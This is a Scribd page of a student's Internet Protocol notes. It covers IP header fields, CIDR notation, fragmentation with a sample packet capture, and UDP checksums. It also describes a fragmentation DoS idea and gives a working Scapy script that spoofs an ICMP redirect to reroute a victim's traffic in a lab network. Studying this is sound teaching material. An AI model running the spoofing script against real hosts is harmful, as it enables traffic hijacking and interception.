Scribd
Upload
44 views

InternetProtocol Notes

IP is the Internet Protocol that defines the format and structure of packets sent over the internet. The IP header contains fields like version, total length, identification, flags, fragment offset, time to live, and protocol. IP addresses are represented using CIDR notation. IP packets can be fragmented into smaller pieces. ICMP redirect attacks try to reroute traffic by spoofing fake ICMP messages from routers. UDP is a transport layer protocol that runs on top of IP and provides checksums for data integrity but they are not always verified.

Uploaded by

simon sylvester
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
44 views

InternetProtocol Notes

IP is the Internet Protocol that defines the format and structure of packets sent over the internet. The IP header contains fields like version, total length, identification, flags, fragment offset, time to live, and protocol. IP addresses are represented using CIDR notation. IP packets can be fragmented into smaller pieces. ICMP redirect attacks try to reroute traffic by spoofing fake ICMP messages from routers. UDP is a transport layer protocol that runs on top of IP and provides checksums for data integrity but they are not always verified.

Uploaded by

simon sylvester
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

IP: Internet Protocol

 IP Header
o Version: 4
o Internet Header Length (IHL): length of the IP header, counted in 4 bytes.
Minimum is 5 (the minimal IP header size is 20).
o Total length: the length of the entire packet, including header and data. Since it
has 16 bits, the maximum size of an IP packet is 216−1=65535
  bytes.
 Identification: To identify the group of fragments of a single IP datagram.
 Flags:
o Bit 0: Reserved, must be zero
o Bit 1: Don’t fragment (DF) - can be used for path MTU discovery
o Bit 2: More fragments (MF)
 Fragment offset: the offset of this packet’s data counted in 8 bytes.
 Time to live: helps prevent IP datagram for persisting on an Internet by limiting a
packet’s life time.
 Protocol: specifies the protocol of the payload.
 IP Address
 CIDR Notation
o 192.168.100.14/24 represents the IPv4 address 192.168.100.14 and its associated
routing prefix 192.168.100.0, or equivalently, its subnet mask 255.255.255.0,
which has 24 leading 1-bits.
o the IPv4 block 192.168.100.0/22 represents the 1024 IPv4 addresses from
192.168.100.0 to 192.168.103.255.
o 192.168.100.0/24 is equivalent to 192.168.100.0/255.255.255.0.
 IP fragmentation
 The fragmented packets will have the same ID.
 All packets except the last one will have MF flag set.
 Sample fragmented IP traffic
o Total size of IP payload: UDPHDR(8) + PAYLOAD(10000)=10008
o The length of each packet: ETHERHDR(14) + IP
o Therefore, each packet of length 1514 contains 1500 bytes of IP data, which
means 1480 bytes of payload. The packet of length 1162 contains
1162−14−20=1128
bytes of payload. The total size of payload is 1480×6+1128=10008
 
o .
No. Source Destination Protocol Length Info
“Fragmented IP protocol (proto=UDP
5 192.168.0.100 192.168.0.1 IPv4 1514 17, off=0, ID=0001) [Reassembled in
#11]”
“Fragmented IP protocol (proto=UDP
6 192.168.0.100 192.168.0.1 IPv4 1514 17, off=1480, ID=0001) [Reassembled
in #11]”
“Fragmented IP protocol (proto=UDP
7 192.168.0.100 192.168.0.1 IPv4 1514 17, off=2960, ID=0001) [Reassembled
in #11]”
“Fragmented IP protocol (proto=UDP
8 192.168.0.100 192.168.0.1 IPv4 1514 17, off=4440, ID=0001) [Reassembled
in #11]”
“Fragmented IP protocol (proto=UDP
9 192.168.0.100 192.168.0.1 IPv4 1514 17, off=5920, ID=0001) [Reassembled
in #11]”
“Fragmented IP protocol (proto=UDP
10 192.168.0.100 192.168.0.1 IPv4 1514 17, off=7400, ID=0001) [Reassembled
in #11]”
11 192.168.0.100 192.168.0.1 UDP 1162 50000 -> 50000 Len=10000
 DOS attack with IP fragmentation: send a lot of packets with MF flag set and different ID to
try to stall the victim’s memory. Unfortunately, this problem has been fixed and it is not
working.
 ICMP redirect attack
 An ICMP redirect is an error message sent by a router to the sender of an IP packet.
Redirects are used when a router believes a packet is being routed sub optimally and it
would like to inform the sending host that it should forward subsequent packets to that
same destination through a different gateway.
 By default, Linux do not process redirect packets. To activate it, one needs to call:
 [02/09/20]seed@vm2:~$ sudo sysctl net.ipv4.conf.all.accept_redirects=1
 net.ipv4.conf.all.accept_redirects = 1
 The construction of an ICMP redirect attack packet
o We spoof a fake ICMP message on behalf of the router of the network to the
victim, informing him that packets sending to 10.0.0.1 should be routed to
10.0.2.5.
 from scapy.all import *
 ip1 = IP(src='10.0.2.1', dst='10.0.2.6')
 icmp = ICMP(type=5, code=1,gw='10.0.2.5')
 ip2 = IP(src='10.0.2.6', dst='10.0.0.1')
 udp = UDP(dport=9090)
 packet = ip1/icmp/ip2/udp
 send(packet)
If the destination IP is a local machine, this may not work because those packets will not
be routed.
 UDP: User Datagram Protocol

 UDP chekcsum is not always verified

You might also like